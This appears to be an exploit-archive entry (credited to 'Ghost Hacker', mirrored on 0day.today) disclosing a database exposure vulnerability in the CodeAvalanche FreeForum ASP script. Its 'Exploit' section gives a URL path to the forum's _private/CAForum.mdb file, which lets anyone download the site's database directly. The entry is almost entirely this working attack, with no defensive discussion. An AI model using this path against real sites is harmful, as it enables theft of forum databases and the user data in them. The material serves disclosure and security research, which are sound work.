id: 4443
date: 12/14/2008
title: CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure Vuln
author: Ghost Hacker
cves: 

=======================================================================
CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure Vulnerability
=======================================================================


####################################################################################################
# FreeForum Database Disclosure Vulnerability                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Name Script : FreeForum                                                                       #
#[~] Download : http://www.truecontent.info/codeavalanche/asp-forum-script.php                     #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/CAForum/_private/CAForum.mdb                                              #
####################################################################################################



#  0day.today [2023-03-25]  #